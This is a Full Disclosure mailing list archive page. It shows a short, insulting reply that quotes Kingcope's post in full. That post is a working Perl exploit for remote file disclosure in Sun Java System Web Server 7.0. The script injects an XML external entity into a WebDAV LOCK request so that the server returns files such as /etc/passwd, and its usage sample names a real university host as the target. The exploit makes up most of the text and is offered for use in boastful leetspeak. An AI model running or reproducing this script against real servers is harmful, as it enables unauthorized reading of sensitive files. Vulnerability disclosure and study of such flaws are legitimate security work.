Full Disclosure mailing list archives
Re: Sun D3VS SM0KiNG PoT AGAiN
From: Christian Sciberras <uuf6429 () gmail com>
Date: Sat, 3 Apr 2010 16:37:19 +0200
"Sun D3VS SM0KiNG PoT AGAiN" "SuPP0RT iF YOU#RE kRAD KTHX" What the fuck is wrong with you guys? Ever gave the psychiatrist a visit? On Sat, Apr 3, 2010 at 3:14 PM, Kingcope <kcope2 () googlemail com> wrote:
sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD KTHX #!/usr/bin/perl # aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !! # MAY/2010 # VERY THANKS TO LSD # # # oO VERiFIED oN Oo # # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS SERVER 2008 & SunOS 5.10] # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE] # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX use IO::Socket; use MIME::Base64; print "//Sun Microsystems Sun Java System Web Server\n"; print "//Remote File Disclosure Exploit\n"; print "//by Kingcope\n"; print "May/2010\n"; if ($#ARGV != 2) { print "usage: perl sunone.pl <target> <webdav directory> <file to get>\n"; print "sample: perl sunone.pl lib7.berkeley.edu /dav /etc/passwd\n"; exit; } $target = $ARGV[0]; $|=1; $remotefile = $ARGV[2]; $folder = $ARGV[1]; $KRADXmL = "<?xml version=\"1.0\"?>\n" ."<!DOCTYPE REMOTE [\n" ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n" ."]>\n" ."<D:lockinfo xmlns:D='DAV:'>\n" ."<D:lockscope><D:exclusive/></D:lockscope>\n" ."<D:locktype><D:write/></D:locktype>\n" ."<D:owner>\n" ."<D:href>\n" ."<REMOTE>\n" ."<RemoteX>&RemoteX;</RemoteX>\n" ."</REMOTE>\n" ."</D:href>\n" ."</D:owner>\n" ."</D:lockinfo>\n"; $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '80', Proto => 'tcp'); print $sock "LOCK /$folder HTTP/1.1\r\n". "Host: $target\r\n". "Depth: 0\r\n". "Connection: close\r\n". "Content-Type: application/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n". $KRADXmL; $locktoken = ""; while(<$sock>) { if ($_ =~ /^Lock-token:\s(.*)?\r/) { $locktoken = $1; chomp $locktoken; } print; } close($sock); $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '80', Proto => 'tcp'); print $sock "UNLOCK /$folder HTTP/1.1\r\n". "Host: $target\r\n". "Connection: close\r\n". "Lock-token: $locktoken\r\n\r\n"; while(<$sock>) { print; } close($sock); _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Sun D3VS SM0KiNG PoT AGAiN Kingcope (Apr 03)
- Re: Sun D3VS SM0KiNG PoT AGAiN Kingcope (Apr 03)
- Re: Sun D3VS SM0KiNG PoT AGAiN Christian Sciberras (Apr 03)
- Re: Sun D3VS SM0KiNG PoT AGAiN Kingcope (Apr 03)
- Re: Sun D3VS SM0KiNG PoT AGAiN Christian Sciberras (Apr 03)
- Re: Sun D3VS SM0KiNG PoT AGAiN Kingcope (Apr 03)